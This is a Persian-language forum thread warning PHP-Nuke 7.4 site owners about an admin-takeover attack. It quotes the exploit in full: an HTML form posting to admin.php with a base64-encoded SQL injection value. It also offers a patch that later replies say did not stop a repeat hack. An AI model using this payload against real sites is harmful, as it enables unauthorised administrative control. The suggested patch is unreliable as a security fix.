اطلاعيه براي هك نشدن سايت شما

سلام..

ديروز يك هكر خارجي سايت من را هك كرد كه خوشبختانه من به موقع رسيدم و مچ طرف را گرفتم و طرف نتوانست كه خرابكاري كند....

هكر توسط كد معروف مثال:


کد:
<form name="form1" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
USERNAME: <input type="text" name="del_aid">

<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="deladminconf">
<input type="submit" name="Submit" value="Delete Admin">
<br>
</p>
</form>
اقدام به هك كردن كرد.من از ناك 7.4 استفاده ميكنم.بعد من سريع براي رفع اين باگ اقدام كردم و يك جستجو انجام دادم كه خوشبختانه به جواب هم رسيدم و تا الان به مشكلي برنخوردم.

شما هم اين را به فايل admin.php اضافه كنيد:

کد:
if ( !empty($HTTP_GET_VARS['op']) ) {
$op = $HTTP_GET_VARS['op'];
}



if ( !empty($HTTP_POST_VARS['op']) ) {
$op = $HTTP_POST_VARS['op'];
}

آدرس سايت مرتبط: http://www.securitytracker.com/alerts/2004/Sep/1011161.html

موفق باشيد.
 

ahvazcity

Member
irantraining جان ميشه بگي كجاي admin.php اضافه كنيم ؟؟ آيا براي nuke 7.4 هم کار میده؟؟
 
اين مشكل فكر كنم اصلا روي 7.4 خطرناك است و من اين رو بعد از

کد:
die("Illegal Operation"); 
}

قرار دادم.
 

ahvazcity

Member
خیلی ممنون ازت
irantraining جان ميشه لطفا ID Yahooتون رو بدید به من؟؟؟
 
guilanict جان.من از سنتيل استفاده ميكردم ولي چون توسط اون فرم بطور خودكار در ديتابيس مدير ساخته ميشه و براي سنتيل مدير حفاظت شده تعريف نشده مدير اصلي ساخته شده بدون هيچ زحمتي وارد كنترل پنل سايت ميشه.
 

izone

Active Member
با همه اين كارها باز هم irantraining عزيز هك شد. امروز يا ديشب.

چيكار بايد كرد با اين هكرهاي بي معرفت ؟؟؟؟؟؟؟
 
من ميخواستم فايل admin.php را پاك كنم ولي گفتم هركسي هك كرده باشه دوباره پيداش ميشه و اگر اين كد جواب ده ديگه نميتونه هك كنه كه ديديم چنين نشد.

فعلا كه بهترين راه همون حذف admin.php يا ارتقا به 7.5 است. :roll:
 

guilanict

Member
همانطور كه ساسان خان گفتند فكر نكنم ايراد از سنتيل باشه هر چند من توصيه مي كنم فايل author.php رو غير اجرايي كنيد نيازي به پاك كردن admin.php نيست.
 

جدیدترین ارسال ها

بالا